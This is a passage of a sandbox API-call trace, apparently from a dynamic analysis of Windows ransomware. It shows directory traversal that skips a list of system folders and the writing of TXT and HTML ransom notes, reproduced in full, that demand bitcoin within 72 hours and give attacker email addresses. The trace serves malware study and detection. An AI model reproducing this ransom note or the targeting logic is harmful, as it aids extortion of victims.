	[0170.704] lstrcmpW (lpString1="Network", lpString2="..") returned 1
	[0170.704] lstrcmpW (lpString1="Network", lpString2=".") returned 1
	[0170.704] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0170.705] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0170.705] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network"
	[0170.705] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network"
	[0170.705] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\"
	[0170.705] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\"
	[0170.705] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\*.*"
	[0170.705] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.706] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned 40
	[0170.706] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.706] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\network\\*.*") returned 0x28
	[0170.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="windows") returned 0x0
	[0170.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="boot") returned 0x0
	[0170.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="system volume information") returned 0x0
	[0170.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="temp") returned 0x0
	[0170.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="program files") returned 0x0
	[0170.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.710] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.710] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="appdata") returned 0x0
	[0170.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="application data") returned 0x0
	[0170.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="winnt") returned 0x0
	[0170.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="tmp") returned 0x0
	[0170.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="cache") returned 0x0
	[0170.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="webcache") returned 0x0
	[0170.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="inetcache") returned 0x0
	[0170.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="nvidia") returned 0x0
	[0170.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="packages") returned 0x0
	[0170.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="cookies") returned 0x0
	[0170.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="programdata") returned 0x0
	[0170.764] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.764] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1
	[0170.765] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1
	[0170.765] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0
	[0170.765] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.765] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.766] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network"
	[0170.766] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\*.*"
	[0170.766] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.766] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.766] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0170.766] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.767] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.767] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.771] CloseHandle (hObject=0x384) returned 1
	[0170.772] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.772] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0170.774] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.774] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.774] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.774] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.774] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0170.775] CloseHandle (hObject=0x384) returned 1
	[0170.775] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.776] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.776] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.776] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0170.777] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.781] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.781] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0170.785] CloseHandle (hObject=0x384) returned 1
	[0170.786] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.786] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.787] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0170.788] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.788] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.788] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.788] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.789] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0170.789] CloseHandle (hObject=0x384) returned 1
	[0170.789] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f531ae2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.790] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned 40
	[0170.790] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.790] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\network\\*.*") returned 0x28
	[0170.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.790] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="windows") returned 0x0
	[0170.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.791] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="boot") returned 0x0
	[0170.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.791] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="system volume information") returned 0x0
	[0170.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.792] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.792] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="temp") returned 0x0
	[0170.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.792] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="program files") returned 0x0
	[0170.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.792] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.793] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="appdata") returned 0x0
	[0170.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.793] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="application data") returned 0x0
	[0170.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.793] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="winnt") returned 0x0
	[0170.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.794] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="tmp") returned 0x0
	[0170.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.794] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="cache") returned 0x0
	[0170.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.794] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.794] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="webcache") returned 0x0
	[0170.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.795] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="inetcache") returned 0x0
	[0170.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.795] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="nvidia") returned 0x0
	[0170.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.795] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="packages") returned 0x0
	[0170.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.795] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="cookies") returned 0x0
	[0170.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\*.*", lpSrch="programdata") returned 0x0
	[0170.796] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.796] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.796] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f531ae2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.796] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.796] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1
	[0170.796] lstrcmpW (lpString1="Connections", lpString2="..") returned 1
	[0170.797] lstrcmpW (lpString1="Connections", lpString2=".") returned 1
	[0170.797] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network"
	[0170.797] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\"
	[0170.797] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections"
	[0170.797] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections"
	[0170.797] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\"
	[0170.797] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\"
	[0170.797] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*"
	[0170.798] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.798] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned 52
	[0170.798] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.798] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\network\\connections\\*.*") returned 0x34
	[0170.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="windows") returned 0x0
	[0170.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="boot") returned 0x0
	[0170.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="system volume information") returned 0x0
	[0170.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\connections\\*.*", lpSrch="temp") returned 0x0
